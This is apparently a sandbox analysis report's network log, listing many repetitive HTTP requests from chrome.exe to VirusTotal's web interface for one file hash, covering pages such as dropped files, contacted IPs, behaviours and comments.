                                                                                                                                                                      https://www.virustotal.com/gui/410.690cf5d5695a51f566f6.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/410.690cf5d5695a51f566f6.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/4509.41bab6b5b8e300ef03da.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/4509.41bab6b5b8e300ef03da.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      x-vt-anti-abuse-header: MTQzMTcyMTgwNTktWkc5dWRDQmlaU0JsZG1scy0xNjczMjcyMjI1Ljk3OA==
                                                                                                                                                                      accept-ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/submissions/add
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      POST /ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/submissions/add HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      content-length: 132
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      x-vt-anti-abuse-header: MTQ1MzQ1NTU1NjQtWkc5dWRDQmlaU0JsZG1scy0xNjczMjcyMjI2LjIzMg==
                                                                                                                                                                      accept-ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      origin: https://www.virustotal.com
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/icon.types-peexe.60b13774c01cc2f83b9d.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/icon.types-peexe.60b13774c01cc2f83b9d.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/dropped_files
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/dropped_files HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      x-vt-anti-abuse-header: MTkzNjc0NTAzMDMtWkc5dWRDQmlaU0JsZG1scy0xNjczMjcyMjI2LjQyNA==
                                                                                                                                                                      accept-ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/contacted_urls
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/contacted_urls HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      x-vt-anti-abuse-header: MTk5MDQwNTI0MDQtWkc5dWRDQmlaU0JsZG1scy0xNjczMjcyMjI2LjQyNQ==
                                                                                                                                                                      accept-ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/contacted_domains
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/contacted_domains HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      x-vt-anti-abuse-header: MTcxMzI5MTk2MDItWkc5dWRDQmlaU0JsZG1scy0xNjczMjcyMjI2LjQyNw==
                                                                                                                                                                      accept-ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/contacted_ips
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/contacted_ips HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      x-vt-anti-abuse-header: MTc0NTI3ODQ3MjktWkc5dWRDQmlaU0JsZG1scy0xNjczMjcyMjI2LjQzMQ==
                                                                                                                                                                      accept-ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/execution_parents
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/execution_parents HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      x-vt-anti-abuse-header: MTU0ODEwODc1ODQtWkc5dWRDQmlaU0JsZG1scy0xNjczMjcyMjI2LjQzMw==
                                                                                                                                                                      accept-ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/pe_resource_parents
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/pe_resource_parents HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      x-vt-anti-abuse-header: MTk0Njg4NjI3MTctWkc5dWRDQmlaU0JsZG1scy0xNjczMjcyMjI2LjQzNQ==
                                                                                                                                                                      accept-ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/bundled_files
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/bundled_files HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      x-vt-anti-abuse-header: MTU2ODkxMjI2MDAtWkc5dWRDQmlaU0JsZG1scy0xNjczMjcyMjI2LjQzNw==
                                                                                                                                                                      accept-ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/pe_resource_children
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/pe_resource_children HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      x-vt-anti-abuse-header: MTI4NjQwMDA5OTYtWkc5dWRDQmlaU0JsZG1scy0xNjczMjcyMjI2LjQzNw==
                                                                                                                                                                      accept-ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/behaviour_mitre_trees
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/behaviour_mitre_trees HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      x-vt-anti-abuse-header: MTg5Mzc4NDE5MzQtWkc5dWRDQmlaU0JsZG1scy0xNjczMjcyMjI2LjQ2OA==
                                                                                                                                                                      accept-ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/behaviours?limit=40
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/behaviours?limit=40 HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      x-vt-anti-abuse-header: MTE3MjE0MTczMTUtWkc5dWRDQmlaU0JsZG1scy0xNjczMjcyMjI2LjQ3Mg==
                                                                                                                                                                      accept-ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/votes?relationships=item%2Cvoter
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/votes?relationships=item%2Cvoter HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      x-vt-anti-abuse-header: MTIyOTMwOTU1MjUtWkc5dWRDQmlaU0JsZG1scy0xNjczMjcyMjI2LjQ4Mg==
                                                                                                                                                                      accept-ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/comments?relationships=item%2Cauthor
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/comments?relationships=item%2Cauthor HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      x-vt-anti-abuse-header: MTM3MjU3NjI3MTEtWkc5dWRDQmlaU0JsZG1scy0xNjczMjcyMjI2LjQ4Mw==
                                                                                                                                                                      accept-ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/references?limit=10
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/references?limit=10 HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      x-vt-anti-abuse-header: MTUwNTI1ODA3MDYtWkc5dWRDQmlaU0JsZG1scy0xNjczMjcyMjI2LjQ4Ng==
                                                                                                                                                                      accept-ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/related_references?limit=10
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/related_references?limit=10 HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      x-vt-anti-abuse-header: MTg4MTUxNjM2NzAtWkc5dWRDQmlaU0JsZG1scy0xNjczMjcyMjI2LjQ4Nw==
                                                                                                                                                                      accept-ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
